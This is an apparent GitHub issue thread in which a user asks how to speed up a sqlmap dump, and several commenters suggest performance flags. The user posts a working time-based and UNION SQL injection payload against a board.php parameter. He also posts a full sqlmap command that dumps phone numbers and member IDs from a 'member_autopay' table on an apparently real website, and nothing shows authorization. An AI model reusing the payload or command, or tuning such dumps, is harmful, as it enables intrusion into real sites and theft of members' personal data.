### ISSUE TITLE
Sqlmap Dump so slow...

### ISSUE THREAD

**Issue by mrblackfree** [sqlmapproject/sqlmap#3604]
I already got all columns and then i chose something using -C option for Union Query
But Dump too slow... how can i do this... 1 columns get 5second... very slow... how...

**Comment by stamparm** [comment]
You failed to fill the Issue template. Currently, there is nothing useful inside the current description

**Comment by huitc** [comment]
try --threads 10 --null-connection --keep-alive ?

--predict-output it may works too

**Comment by huitc** [comment]
disable --delay
set to lower value --time-sec ?

**Comment by mrblackfree** [comment]
my method POST type... cant use null-connection...

**Comment by mrblackfree** [comment]
My payload... this...
/bbs/board.php?bbs=win04&bbs=win01&idx=20968&page=&sfield=if(now()=sysdate(),sleep(0),0)/-5518 UNION ALL SELECT 5746,CONCAT(0x716b787071,0x67726a6c454c636547425073774352424b435871534e67477570695050566e4666784247654d6f47,0x716a767871)-- hpaQ'XOR(if(now()=sysdate(),sleep(0),0))OR'XOR(if(now()=sysdate(),sleep(0),0))OR/&svalue=%_st HTTP/1.1

**Comment by mrblackfree** [comment]
> disable --delay
> set to lower value --time-sec ?

still cant... omg...

**Comment by huitc** [comment]
show me what you typed

**Comment by huitc** [comment]
command

**Comment by mrblackfree** [comment]
> command

sqlmap.py -u "........./bbs/board.php" -p "sfield" --method="POST" --data="/bbs/board.php?bbs=win04&bbs=win01&idx=20968&page=&sfield=if(now()=sysdate()%2csleep(0)%2c0)/*'XOR(if(now()=sysdate()%2csleep(0)%2c0))OR'"XOR(if(now()=sysdate()%2csleep(0)%2c0))OR"*/&svalue=%_st HTTP/1.1"  --dbms=mysql --batch -D sike4u -T member_autopay -C hp,id,idx,wdate --dump --technique U --banner --threads 10 --start=513344 --delay=1

**Comment by huitc** [comment]
try `--keep-alive` ?... ^^''

**Comment by mrblackfree** [comment]
> try `--keep-alive` ?... ^^''

still slow...

**Comment by huitc** [comment]
`-hh` add oil~!😃

**Comment by thebrutus314** [comment]
you can try --timeout=15 --technique=BEUS --threads=1 -o
that worked!!
